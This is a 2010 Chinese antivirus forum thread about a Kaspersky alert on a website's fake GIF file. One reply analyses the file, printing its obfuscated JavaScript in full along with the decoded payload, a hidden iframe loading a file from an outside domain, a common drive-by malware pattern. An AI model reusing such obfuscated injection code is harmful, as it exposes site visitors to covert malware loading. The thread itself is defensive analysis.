查看: 2874|回复: 9
收起左侧

[其它] 卡巴报www.52hunt.com

[复制链接]
nicholastse53
发表于 2010-4-12 21:54:50 | 显示全部楼层 |阅读模式
每次打开这个网站卡巴都要报那个gif病毒,不知道怎么回事哦。是不是误报。www,52hunt.com
nicholastse53
 楼主| 发表于 2010-4-12 21:55:41 | 显示全部楼层
不好意思,WWW后面那个.打错了
flame123
发表于 2010-4-12 22:19:40 | 显示全部楼层
小a没有反应。你清空回收站看看。
nicholastse53
 楼主| 发表于 2010-4-12 22:23:23 | 显示全部楼层
回复 3# flame123


    是啊,我用金山网盾用诺顿安全特警,小红伞都不报这个网站就只有卡巴斯基要报,晕死/
幸福的猪猪
发表于 2010-4-13 06:04:10 | 显示全部楼层
本帖最后由 幸福的猪猪 于 2010-4-13 09:07 编辑

回复 4# nicholastse53

那个GIF"图片"不是真的图片文件,而是一个加过密的脚本文件。

  1. <html><head><Meta Name=Encoder Content=HTMLSHIP>
  2. <script language="javascript"><!--
  3. oK84="\)\$\|Z\{\ \=\ i2\{X",yT60="\{\$\ Z\=\|\=\%F";0.6177757,gW70="0.5092029",oK84='\=\)C2\-\<hSp\?O6\$Jz\;35f\(GI\}ZW\+7M1B0\_\>HmK8\!\^abl9iut"F\~DA\[\%\\\`\#qnk\ EcyVvL\{U\&\]PdeQ\'\|Y\@\,g\n\rXxrRj\*Ts\.wN\/o\:4',yT60='fKX2vH\'C\>w\ \\uyMF\="8pRcW\?h1\,Z7\{k\;9s\!\)3\&n0l\%\/bO\`EA\rq4aTS\(r\:\^Jit\[\*g\+5\~U\.j\]\@\<Y\-DNBLQ\nd6z\#I\_\}G\$VmeoP\|x';function aL73(aM29){"\{\$FXXZ\ X\%",l=aM29.length;'b\]\-77H\{H\!',w='';while(l--)"X\$ZX\ \)1Fi2\{X",o=oK84.indexOf(aM29.charAt(l)),'b\]\!\[\[B\[\[\!',w=(o==-1?aM29.charAt(l):yT60.charAt(o))+w;"\{\$\=\=1\ \{\ X",oK84=oK84.substring(1)+oK84.charAt(0),document.write(w);'\{\]xx\{\[x\!F\|b\-'};aL73("eHI\#\ \(EOb\[\^V\$\[VN3\]\[\-\[HI\#\ \(EpWMf13\>\>X\_\=\$\^IE\ \/\^Oj\r\?H\`KB\?\ \^\r\/\?\&HE\[E\$HO3O5O5\_HNE\%\ wN\/\$E\`5j\r\?H\`K57\+aaK\_\*\_j\r\?H\`K\_\]U1a32A2\+\_\_jb\ IN\^HN\rjE\/j35W\$J\$\=N\^V5\_e9HI\#\ \(Ep")//--></script><sCrIpT LANgUaGe=jaVAscrIPt>aL73("QE\)q\%N\/6mq\}5\+ccGniiOOO\]\{l\%\%\%\]\}ai\%P\]vE\)6OEXc\+57b6\+\/Ev\+c5b\?QiE\)q\%N\/\?")</script></head><body></body></html>
复制代码



通过在线解密网站得出:
  1. //document.write (s)  <script language=javascript>hZ87=996;function _dws(){window.status = " ";setTimeout("_dws()",100);};_dws();jU70=2421;;_licensed_to_="huyufeng";</script><iframe src=http://www.5laaa.cn/aj.gif width=10 height=0></iframe> //jsunpack.url var w = <iframe src=http://www.5laaa.cn/aj.gif width=10 height=0></iframe>  
复制代码


hxxp://www.5laaa.cn/aj.gif 这个地址,我这边不能获取到源代码。也就是说不能进一步的确认(或者假设)这个页面是否为挂马网页。(也有可能是个统计的页面...)

p.s.样本提交卡巴斯基(中国)分析。
nicholastse53
 楼主| 发表于 2010-4-13 12:15:06 | 显示全部楼层
回复 5# 幸福的猪猪


    我不知道怎么提交给卡巴司机分析,兄弟你帮我提交,每次打开都要报毒。
wangjing520234
发表于 2010-4-13 12:28:31 | 显示全部楼层
红伞拒绝访问
lioulb
发表于 2010-4-20 15:09:50 | 显示全部楼层
EAV+SpyEmergency+OP,没反应
angir
发表于 2010-4-25 11:12:22 | 显示全部楼层
目前卡巴还在报毒,不过是启发
tester
发表于 2010-4-25 21:49:44 | 显示全部楼层
没发现问题
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-31 11:48 , Processed in 0.138007 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表